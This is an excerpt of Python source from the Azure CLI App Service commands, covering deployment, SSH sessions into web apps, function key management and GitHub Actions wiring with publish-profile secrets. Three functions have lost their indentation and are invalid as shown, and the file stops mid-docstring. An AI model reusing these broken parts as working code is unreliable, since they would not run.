    # BUGFIX: a file name without any '.' used to raise IndexError here;
    # treat it as having no extension so it falls into the 'static' bucket.
    file_extension = name_parts[1] if len(name_parts) > 1 else ''
    if file_extension in ('war', 'jar', 'ear', 'zip'):
        params.artifact_type = file_extension
    elif file_extension in ('sh', 'bat'):
        params.artifact_type = 'startup'
    else:
        params.artifact_type = 'static'
    # Typo fix: 'deloyment' -> 'deployment' in the user-facing warning
    logger.warning("Deployment type: %s. To override deployment type, please specify the --type parameter. "
                   "Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
    """POST the OneDeploy request to Kudu and return the deployment result.

    On 200/202 the async deployment status is polled until completion and the
    final status body is returned. Raises CLIError on 404 (API not available),
    409 (another deployment already in progress), and any other status code.
    """
    import requests

    from azure.cli.core.util import (
        should_disable_connection_verify,
    )
    # Build the request body, headers, API URL and status URL
    body = _get_onedeploy_request_body(params)
    headers = _get_basic_headers(params)
    deploy_url = _build_onedeploy_url(params)
    deployment_status_url = _get_onedeploy_status_url(params)

    logger.info("Deployment API: %s", deploy_url)
    response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())

    # For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
    # For that, set poll_async_deployment_for_debugging=True
    poll_async_deployment_for_debugging = True

    # check the status of async deployment
    if response.status_code in (200, 202):
        response_body = None
        if poll_async_deployment_for_debugging:
            logger.info('Polling the status of async deployment')
            response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
                                                         deployment_status_url, headers, params.timeout)
            logger.info('Async deployment complete. Server response: %s', response_body)
        return response_body

    # API not available yet!
    if response.status_code == 404:
        raise CLIError("This API isn't available in this environment yet!")

    # check if there's an ongoing process
    if response.status_code == 409:
        raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
                       "starting a new deployment. You can track the ongoing deployment at {}"
                       .format(deployment_status_url))

    # Any other status code is a deployment error. (The original guarded this with
    # `if response.status_code:`, which is always true for a completed HTTP response
    # and would otherwise silently return None; raise unconditionally instead.
    # Also fixes the 'occured' typo in the error message.)
    raise CLIError("An error occurred during deployment. Status Code: {}, Details: {}"
                   .format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
    """Resolve the artifact type, then fire the OneDeploy request and return its response."""
    # Update artifact type, if required
    _update_artifact_type(params)

    logger.info("Initiating deployment")
    result = _make_onedeploy_request(params)
    logger.info("Deployment has completed successfully")
    return result
def _wait_for_webapp(tunnel_server):
    """Poll once per second (up to 60 tries) until the tunnelled webapp responds.

    Raises CLIError when the app never comes up within the allotted attempts.
    """
    attempts = 0
    while not is_webapp_up(tunnel_server):
        if attempts == 0:
            logger.warning('Connection is not ready yet, please wait')
        if attempts == 60:
            raise CLIError('SSH timeout, your app must be running before'
                           ' it can accept SSH connections. '
                           'Use `az webapp log tail` to review the app startup logs.')
        attempts += 1
        logger.warning('.')
        time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
    """Thread target: open an interactive SSH shell through the local tunnel.

    Retries the connection once per second for up to 60 tries (the tunnel may
    not be accepting connections yet), then prints the message of the day and
    execs a login shell so the user lands in an interactive session.
    NOTE(review): Connection is imported elsewhere in this file — presumably
    Fabric's Connection; confirm against the module's imports.
    """
    tries = 0
    while True:
        try:
            c = Connection(host=hostname,
                           port=port,
                           user=username,
                           # connect_timeout=60*10,
                           connect_kwargs={"password": password})
            break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            if tries == 0:
                logger.warning('Connection is not ready yet, please wait')
            if tries == 60:
                raise CLIError("Timeout Error, Unable to establish a connection")
            tries = tries + 1
            logger.warning('.')
            time.sleep(1)
    try:
        c.run('cat /etc/motd', pty=True)
        # Replace the remote process with a login shell for the interactive session
        c.run('source /etc/profile; exec $SHELL -l', pty=True)
    except Exception as ex:  # pylint: disable=broad-except
        logger.info(ex)
    finally:
        c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):  # pylint: disable=too-many-statements
    """Open an SSH session into a Linux webapp's container.

    On Windows clients the browser-based Kudu web SSH page is launched instead
    of a local tunnel; elsewhere a tunnel plus terminal SSH session is created.
    Remote debugging must be disabled because it occupies the tunnelled port.
    """
    import platform

    if platform.system() == "Windows":
        webapp = show_webapp(cmd, resource_group_name, name, slot)
        if not webapp.reserved:  # only Linux plans expose an SSH-able container
            raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
        open_page_in_browser(scm_url + '/webssh/host')
        return

    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        raise ValidationError('Remote debugging is enabled, please disable')
    create_tunnel_and_session(
        cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
        cmd,
        functionapp_name=None,
        organization_name=None,
        project_name=None,
        repository_name=None,
        overwrite_yaml=None,
        allow_force_push=None,
        github_pat=None,
        github_repository=None
):
    """Interactively provision an Azure DevOps build pipeline for a function app."""
    from .azure_devops_build_interactive import AzureDevopsBuildInteractive
    interactive_builder = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
                                                      organization_name, project_name, repository_name,
                                                      overwrite_yaml, allow_force_push,
                                                      github_pat, github_repository)
    return interactive_builder.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
    """Turn on filesystem application and container logging for the app (idempotent)."""
    logger.warning("Configuring default logging for the app, if not already enabled")
    return config_diagnostics(cmd, rg_name, name, application_logging=True,
                              web_server_logging='filesystem', docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
    """Expand an ASE name into a full resource ID; values that already are IDs pass through."""
    if is_valid_resource_id(ase):
        return ase

    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(subscription=get_subscription_id(cli_ctx),
                       resource_group=resource_group_name,
                       namespace='Microsoft.Web',
                       type='hostingEnvironments',
                       name=ase)
def _validate_asp_sku(app_service_environment, sku):
    """Reject invalid SKU/ASE combinations.

    Isolated SKUs require an App Service Environment, and a plan inside an ASE
    may only use an Isolated SKU.
    """
    is_isolated_sku = sku.upper() in ['I1', 'I2', 'I3', 'I1V2', 'I2V2', 'I3V2']
    if is_isolated_sku and not app_service_environment:
        raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
                       "learn more: https://docs.microsoft.com/azure/app-service/overview-hosting-plans")
    if not is_isolated_sku and app_service_environment:
        raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
                       "learn more: https://docs.microsoft.com/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
    """Expand a Key Vault name into a full resource ID; values that already are IDs pass through."""
    if is_valid_resource_id(key_vault):
        return key_vault

    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(subscription=get_subscription_id(cli_ctx),
                       resource_group=resource_group_name,
                       namespace='Microsoft.KeyVault',
                       type='vaults',
                       name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
    """Return True when *hostname* is bound to the app with a Verified or Managed binding."""
    bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_host_name_bindings', slot)
    for binding in bindings:
        bound_name = binding.name.split('/')[-1]
        if bound_name.lower() == hostname and binding.host_name_type in ('Verified', 'Managed'):
            return True
    return False
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
    """Create or update a function-host key of the given type on an app or slot."""
    # pylint: disable=protected-access
    key_info = KeyInfo(name=key_name, value=key_value)
    # Patch the serialization map so name/value land under 'properties' in the ARM payload
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.create_or_update_host_secret(resource_group_name,
                                                            name,
                                                            key_type,
                                                            key_name, key=key_info)
    return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
                                                             name,
                                                             key_type,
                                                             key_name,
                                                             slot, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
    """List all function-host keys of an app or one of its slots."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.list_host_keys(resource_group_name, name)
    return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
    """Delete a function-host key of the given type from an app or one of its slots."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
    return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
def show_function(cmd, resource_group_name, name, function_name):
    """Show a single function of a function app, or a not-found message string."""
    client = web_client_factory(cmd.cli_ctx)
    function = client.web_apps.get_function(resource_group_name, name, function_name)
    if function is None:
        return "Function '{}' does not exist in app '{}'".format(function_name, name)
    return function
def delete_function(cmd, resource_group_name, name, function_name):
    """Delete a single function from a function app."""
    client = web_client_factory(cmd.cli_ctx)
    return client.web_apps.delete_function(resource_group_name, name, function_name)
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
    """Create or update a key for a specific function on an app or slot."""
    # pylint: disable=protected-access
    key_info = KeyInfo(name=key_name, value=key_value)
    # Patch the serialization map so name/value land under 'properties' in the ARM payload
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.create_or_update_function_secret(resource_group_name,
                                                                name,
                                                                function_name,
                                                                key_name,
                                                                key_info)
    return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
                                                                 name,
                                                                 function_name,
                                                                 key_name,
                                                                 slot,
                                                                 key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
    """List the keys of one function inside a function app (or slot)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if not slot:
        return web_apps.list_function_keys(resource_group_name, name, function_name)
    return web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
    """Delete a named key from one function inside a function app (or slot)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if not slot:
        return web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
    return web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None,  # pylint: disable=too-many-statements,too-many-branches
                       branch='master', login_with_github=False, force=False):
    """Connect a webapp to a GitHub repo by committing a GitHub Actions workflow.

    Verifies the app, the repo/branch and the runtime; fills a workflow template;
    commits it to .github/workflows; stores the app's publish profile as a repo
    secret; and points the site's source-control config at the repo.
    Returns the repo's GitHub Actions URL.
    """
    if not token and not login_with_github:
        raise_missing_token_suggestion()
    elif not token:
        scopes = ["admin:repo_hook", "repo", "workflow"]
        token = get_github_access_token(cmd, scopes)
    elif token and login_with_github:
        logger.warning("Both token and --login-with-github flag are provided. Will use provided token")

    # Verify resource group, app
    site_availability = get_site_availability(cmd, name)
    if site_availability.name_available or (not site_availability.name_available and
                                            site_availability.reason == 'Invalid'):
        raise ResourceNotFoundError(
            "The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
            "was not found." % (name, resource_group))
    app_details = get_app_details(cmd, name)
    if app_details is None:
        raise ResourceNotFoundError(
            "Unable to retrieve details of the existing app %s. Please check that the app is a part of "
            "the current subscription" % name)
    current_rg = app_details.resource_group
    if resource_group is not None and (resource_group.lower() != current_rg.lower()):
        raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
                                    "value entered %s. Please re-run command with the correct "
                                    "parameters." % (name, current_rg, resource_group))
    parsed_plan_id = parse_resource_id(app_details.server_farm_id)
    client = web_client_factory(cmd.cli_ctx)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    is_linux = plan_info.reserved

    # Verify github repo
    from github import Github, GithubException
    from github.GithubException import BadCredentialsException, UnknownObjectException
    if repo.strip()[-1] == '/':
        repo = repo.strip()[:-1]
    g = Github(token)
    github_repo = None
    try:
        github_repo = g.get_repo(repo)
        try:
            github_repo.get_branch(branch=branch)
        except GithubException as e:
            error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
            if e.data and e.data['message']:
                error_msg += " Error: {}".format(e.data['message'])
            raise CLIError(error_msg)
        logger.warning('Verified GitHub repo and branch')
    except BadCredentialsException:
        raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
                       "the --token argument. Run 'az webapp deployment github-actions add --help' "
                       "for more information.")
    except GithubException as e:
        error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
        if e.data and e.data['message']:
            error_msg += " Error: {}".format(e.data['message'])
        raise CLIError(error_msg)

    # Verify runtime
    app_runtime_info = _get_app_runtime_info(
        cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)

    app_runtime_string = None
    if app_runtime_info and app_runtime_info['display_name']:
        app_runtime_string = app_runtime_info['display_name']

    github_actions_version = None
    if app_runtime_info and app_runtime_info['github_actions_version']:
        github_actions_version = app_runtime_info['github_actions_version']

    if runtime and app_runtime_string:
        if app_runtime_string.lower() != runtime.lower():
            # BUG FIX: the original passed a plain string with literal
            # '{app_runtime_string}'/'{runtime}' placeholders (no f-string, no
            # args), so the warning never showed the actual runtimes.
            logger.warning('The app runtime: %s does not match the runtime specified: '
                           '%s. Using the specified runtime %s.', app_runtime_string, runtime, runtime)
            app_runtime_string = runtime
    elif runtime:
        app_runtime_string = runtime

    if not app_runtime_string:
        raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')

    if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
        raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)

    # Get workflow template
    logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
    workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)

    # Fill workflow template
    guid = str(uuid.uuid4()).replace('-', '')
    publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
    logger.warning(
        'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
        name, branch, github_actions_version, slot if slot else 'production')
    completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
                                                      branch=branch, slot=slot, publish_profile=publish_profile_name,
                                                      version=github_actions_version)
    completed_workflow_file = completed_workflow_file.encode()

    # Check if workflow exists in repo, otherwise push
    if slot:
        file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
    else:
        file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
    dir_path = "{}/{}".format('.github', 'workflows')
    file_path = "/{}/{}".format(dir_path, file_name)
    try:
        existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
        existing_publish_profile_name = _get_publish_profile_from_workflow_file(
            workflow_file=str(existing_workflow_file.decoded_content))
        if existing_publish_profile_name:
            # Reuse the secret name already referenced by the repo's workflow so
            # we update that secret instead of orphaning it.
            completed_workflow_file = completed_workflow_file.decode()
            completed_workflow_file = completed_workflow_file.replace(
                publish_profile_name, existing_publish_profile_name)
            completed_workflow_file = completed_workflow_file.encode()
            publish_profile_name = existing_publish_profile_name
        logger.warning("Existing workflow file found")
        if force:
            logger.warning("Replacing the existing workflow file")
            github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
                                    content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
        else:
            option = prompt_y_n('Replace existing workflow file?')
            if option:
                logger.warning("Replacing the existing workflow file")
                github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
                                        content=completed_workflow_file, sha=existing_workflow_file.sha,
                                        branch=branch)
            else:
                logger.warning("Use the existing workflow file")
                if existing_publish_profile_name:
                    publish_profile_name = existing_publish_profile_name
    except UnknownObjectException:
        logger.warning("Creating new workflow file: %s", file_path)
        github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
                                content=completed_workflow_file, branch=branch)

    # Add publish profile to GitHub
    logger.warning('Adding publish profile to GitHub')
    _add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
                                   token=token, github_actions_secret_name=publish_profile_name,
                                   slot=slot)

    # Set site source control properties
    _update_site_source_control_properties_for_gh_action(
        cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)

    github_actions_url = "https://github.com/{}/actions".format(repo)
    return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None,  # pylint: disable=too-many-statements
                          branch='master', login_with_github=False):
    """Disconnect a webapp from GitHub Actions deployment.

    Removes the generated workflow file from the repo, deletes the
    publish-profile secret it referenced, and clears the site's
    source-control configuration. Returns a confirmation string.
    """
    # Resolve a GitHub token: explicit --token wins; otherwise run the
    # interactive GitHub login flow requesting the needed scopes.
    if not token and not login_with_github:
        raise_missing_token_suggestion()
    elif not token:
        scopes = ["admin:repo_hook", "repo", "workflow"]
        token = get_github_access_token(cmd, scopes)
    elif token and login_with_github:
        logger.warning("Both token and --login-with-github flag are provided. Will use provided token")

    # Verify resource group, app
    # name_available == True means no such site exists (availability implies absence).
    site_availability = get_site_availability(cmd, name)
    if site_availability.name_available or (not site_availability.name_available and
                                            site_availability.reason == 'Invalid'):
        raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
                       (name, resource_group))
    app_details = get_app_details(cmd, name)
    if app_details is None:
        raise CLIError("Unable to retrieve details of the existing app %s. "
                       "Please check that the app is a part of the current subscription" % name)
    current_rg = app_details.resource_group
    if resource_group is not None and (resource_group.lower() != current_rg.lower()):
        raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
                       "the value entered %s. Please re-run command with the correct "
                       "parameters." % (name, current_rg, resource_group))

    # Verify github repo
    from github import Github, GithubException
    from github.GithubException import BadCredentialsException, UnknownObjectException
    # Normalize a trailing slash in the repo identifier ('owner/name/').
    if repo.strip()[-1] == '/':
        repo = repo.strip()[:-1]
    g = Github(token)
    github_repo = None
    try:
        github_repo = g.get_repo(repo)
        try:
            github_repo.get_branch(branch=branch)
        except GithubException as e:
            error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
            if e.data and e.data['message']:
                error_msg += " Error: {}".format(e.data['message'])
            raise CLIError(error_msg)
        logger.warning('Verified GitHub repo and branch')
    except BadCredentialsException:
        raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
                       "the --token argument. Run 'az webapp deployment github-actions add --help' "
                       "for more information.")
    except GithubException as e:
        error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
        if e.data and e.data['message']:
            error_msg += " Error: {}".format(e.data['message'])
        raise CLIError(error_msg)

    # Check if workflow exists in repo and remove
    # File name mirrors the one generated by add_github_actions (slot-aware).
    file_name = "{}_{}({}).yml".format(
        branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
        branch.replace('/', '-'), name.lower())
    dir_path = "{}/{}".format('.github', 'workflows')
    file_path = "/{}/{}".format(dir_path, file_name)
    existing_publish_profile_name = None
    try:
        existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
        # Remember which publish-profile secret the workflow referenced so we
        # can delete it from the repo's secrets afterwards.
        existing_publish_profile_name = _get_publish_profile_from_workflow_file(
            workflow_file=str(existing_workflow_file.decoded_content))
        logger.warning("Removing the existing workflow file")
        github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
                                sha=existing_workflow_file.sha, branch=branch)
    except UnknownObjectException as e:
        error_msg = "Error when removing workflow file."
        if e.data and e.data['message']:
            error_msg += " Error: {}".format(e.data['message'])
        raise CLIError(error_msg)

    # Remove publish profile from GitHub
    if existing_publish_profile_name:
        logger.warning('Removing publish profile from GitHub')
        _remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
                                            github_actions_secret_name=existing_publish_profile_name, slot=slot)

    # Remove site source control properties
    delete_source_control(cmd=cmd,
                          resource_group_name=resource_group,
                          name=name,
                          slot=slot)

    return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
                                                         branch="master", slot=None):
    """Reset the app's source-control config to point at the GitHub Actions repo/branch."""
    repo_url = 'https://github.com/' + repo if repo else None

    site_source_control = show_source_control(cmd=cmd,
                                              resource_group_name=resource_group,
                                              name=name,
                                              slot=slot)
    if site_source_control:
        # Keep the previously configured repo URL when none was supplied,
        # then drop the old binding before re-creating it.
        if not repo_url:
            repo_url = site_source_control.repo_url
        delete_source_control(cmd=cmd,
                              resource_group_name=resource_group,
                              name=name,
                              slot=slot)

    config_source_control(cmd=cmd,
                          resource_group_name=resource_group,
                          name=name,
                          repo_url=repo_url,
                          repository_type='github',
                          github_action=True,
                          branch=branch,
                          git_token=token,
                          slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
    """Fetch the GitHub Actions workflow template matching the app's runtime.

    Templates live in the public Azure/actions-workflow-templates repo.
    """
    from github import GithubException
    from github.GithubException import BadCredentialsException

    template_repo_path = 'Azure/actions-workflow-templates'
    template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)

    file_contents = None
    try:
        template_repo = github.get_repo(template_repo_path)
        file_contents = template_repo.get_contents(template_file_path)
    except BadCredentialsException:
        raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
                       "the --token argument. Run 'az webapp deployment github-actions add --help' "
                       "for more information.")
    except GithubException as e:
        error_msg = "Encountered GitHub error when retrieving workflow template"
        if e.data and e.data['message']:
            error_msg += ": {}".format(e.data['message'])
        raise CLIError(error_msg)
    return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
    """Map a runtime display string (e.g. 'java|1.8|tomcat|9.0') to a workflow template path.

    Raises CLIError when the runtime is missing or has no known template.
    """
    if not runtime_string:
        raise CLIError('Unable to retrieve workflow template')

    runtime_string = runtime_string.lower()
    runtime_stack = runtime_string.split('|')[0]
    template_file_path = None
    if is_linux:
        template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
    else:
        # Handle java naming: on Windows the container type (third segment of
        # 'java|<version>|<container>|<container-version>') picks the template.
        if runtime_stack == 'java':
            java_container_split = runtime_string.split('|')
            # BUG FIX: indexing [2] requires at least 3 segments; the original
            # guard (len >= 2) raised IndexError for strings like 'java|1.8'.
            if java_container_split and len(java_container_split) >= 3:
                if java_container_split[2] == 'tomcat':
                    runtime_stack = 'tomcat'
                elif java_container_split[2] == 'java se':
                    runtime_stack = 'java'
        template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)

    if not template_file_path:
        raise CLIError('Unable to retrieve workflow template.')
    return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
    """Store the app's publish profile (with secrets) as an encrypted GitHub Actions secret.

    Fetches the WebDeploy publish profile XML, encrypts it with the repo's
    libsodium public key, and PUTs it to the GitHub secrets API under
    github_actions_secret_name. Raises CLIError on any failed step.
    """
    # Get publish profile with secrets
    import requests
    logger.warning("Fetching publish profile with secrets for the app '%s'", name)
    publish_profile_bytes = _generic_site_operation(
        cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
        slot, {"format": "WebDeploy"})
    # The operation streams bytes; materialize and decode the first chunk.
    publish_profile = list(publish_profile_bytes)
    if publish_profile:
        publish_profile = publish_profile[0].decode('ascii')
    else:
        raise CLIError('Unable to retrieve publish profile.')

    # Add publish profile with secrets as a GitHub Actions Secret in the repo
    headers = {}
    headers['Authorization'] = 'Token {}'.format(token)
    headers['Content-Type'] = 'application/json;'
    headers['Accept'] = 'application/json;'

    # GitHub requires secrets to be sealed with the repo's public key.
    public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
    public_key = requests.get(public_key_url, headers=headers)
    if not public_key.ok:
        raise CLIError('Request to GitHub for public key failed.')
    public_key = public_key.json()

    encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
                                                                     secret_value=str(publish_profile))
    payload = {
        "encrypted_value": encrypted_github_actions_secret,
        "key_id": public_key['key_id']
    }

    store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
    stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
    # Any 2xx status (201 created / 204 updated) counts as success.
    if str(stored_secret.status_code)[0] != '2':
        raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
    """Delete the publish-profile secret from the repo's GitHub Actions secrets.

    Best-effort: the response is not checked, matching the disconnect flow's
    tolerance for an already-missing secret.
    """
    import requests
    secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
    requests.delete(secret_url, headers={'Authorization': 'Token {}'.format(token)})
def _runtime_supports_github_actions(runtime_string, is_linux):
    """Return True when the given runtime has GitHub Actions workflow support.

    A runtime is supported when a stack whose displayName matches
    runtime_string (case-insensitively) carries non-empty
    github_actions_properties in the stacks file.
    """
    os_key = 'linux' if is_linux else 'windows'
    stacks = get_file_json(RUNTIME_STACKS)[os_key]
    for stack in stacks:
        if stack['displayName'].lower() == runtime_string.lower():
            # Early return: the original kept scanning after finding support.
            if 'github_actions_properties' in stack and stack['github_actions_properties']:
                return True
    return False
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
    """Detect the app's runtime stack and version for workflow-template selection.

    Returns the dict from _get_app_runtime_info_helper, or None (implicitly)
    when the runtime cannot be determined.
    """
    app_runtime = None
    if is_linux:
        # On Linux the full runtime string lives in linux_fx_version (e.g. 'PYTHON|3.8').
        app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
        app_runtime = getattr(app_metadata, 'linux_fx_version', None)
        return _get_app_runtime_info_helper(app_runtime, "", is_linux)

    # On Windows the stack name comes from site metadata; the version source
    # differs per stack (app settings, site config, or none).
    app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
    app_metadata_properties = getattr(app_metadata, 'properties', {})
    if 'CURRENT_STACK' in app_metadata_properties:
        app_runtime = app_metadata_properties['CURRENT_STACK']

    if app_runtime and app_runtime.lower() == 'node':
        app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
        for app_setting in app_settings:
            if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
                app_runtime_version = app_setting['value'] if 'value' in app_setting else None
                if app_runtime_version:
                    return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
    elif app_runtime and app_runtime.lower() == 'python':
        app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
        app_runtime_version = getattr(app_settings, 'python_version', '')
        return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
    elif app_runtime and app_runtime.lower() == 'dotnetcore':
        # Windows metadata exposes no .NET Core version; the stacks-file entry
        # matches on an empty version string. (Removed a dead
        # `app_runtime_version = '3.1'` that was immediately overwritten by "".)
        app_runtime_version = ""
        return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
    elif app_runtime and app_runtime.lower() == 'java':
        app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
        app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
            java_version=getattr(app_settings, 'java_version', '').lower(),
            java_container=getattr(app_settings, 'java_container', '').lower(),
            java_container_version=getattr(app_settings, 'java_container_version', '').lower()
        )
        return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
    """Match a detected runtime against the stacks file.

    Returns {'display_name', 'github_actions_version'} for the first matching
    stack that supports GitHub Actions, else None. Linux stacks match on
    displayName; Windows stacks match on app_runtime + app_runtime_version.
    """
    os_key = 'linux' if is_linux else 'windows'
    for stack in get_file_json(RUNTIME_STACKS)[os_key]:
        ga_props = stack['github_actions_properties'] if 'github_actions_properties' in stack else None
        if not ga_props:
            continue
        if is_linux:
            matched = stack['displayName'].lower() == app_runtime.lower()
        else:
            matched = (ga_props['app_runtime'].lower() == app_runtime.lower() and
                       ga_props['app_runtime_version'].lower() == app_runtime_version.lower())
        if matched:
            return {
                "display_name": stack['displayName'],
                "github_actions_version": ga_props['github_actions_version']
            }
    return None
def _encrypt_github_actions_secret(public_key, secret_value):
    """Seal a secret string with the repo's libsodium public key.
